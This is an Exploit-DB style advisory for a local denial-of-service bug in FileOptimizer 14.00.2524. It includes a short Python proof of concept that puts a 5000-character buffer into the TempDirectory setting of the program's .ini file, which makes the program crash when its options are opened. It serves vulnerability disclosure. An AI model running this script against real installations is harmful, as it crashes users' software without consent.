FileOptimizer 14.00.2524 - Denial of Service (PoC)

vendor:

FileOptimizer

by:

Chase Hatch (SYANiDE)

0.0

CVSS

LOW

Denial of Service

CWE

Product Name: FileOptimizer

Affected Version From: 14.00.2524

Affected Version To: 14.00.2524

Patch Exists: NO

Related CWE: none

CPE: a:nikkhokkho:fileoptimizer:14.00.2524

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 Ultimate x86 SP0

2019

FileOptimizer 14.00.2524 – Denial of Service (PoC)

FileOptimizer 14.00.2524 is vulnerable to a denial of service attack. An attacker can create a malicious configuration file with a large buffer of characters, which when opened by the application will cause it to crash. This can be done by replacing the “TempDirectory” variable in the “FileOptimizer32.ini” file with a large buffer of characters.

Mitigation:

Ensure that the application is configured to only accept valid input and reject any malicious input.

Source

Exploit-DB raw data:

# Exploit Title:  FileOptimizer 14.00.2524 - Denial of Service (PoC)
# Date: 2019-11-04
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: https://sourceforge.net/projects/nikkhokkho/
# Software Link: https://sourceforge.net/projects/nikkhokkho/files/FileOptimizer/14.00.2524/FileOptimizerSetup.exe/download
# Version: 14.00.2524
# Tested on: Windows 7 Ultimate x86 SP0
# CVE : none

## Steps to reproduce
## Open application for the first time so it generates "FileOptimizer32.ini" in the install directory
## Run the PoC
## Open FileOptimizer again, navigating to "Optimize" / "Options".
## Click OK to crash

#! /usr/bin/env python
import os, sys, re

test="TempDirectory="  # variable/str in config file to replace with buffer
dir = "C:\\Program Files\\FileOptimizer\\"
file = "FileOptimizer32.ini"

sploit = "A"*5000

temp = open(dir+file,'r').read()
temp2 = re.sub(test, test + sploit, temp) 
with open(dir+file,'w') as F:
    F.write(temp2)
    F.close()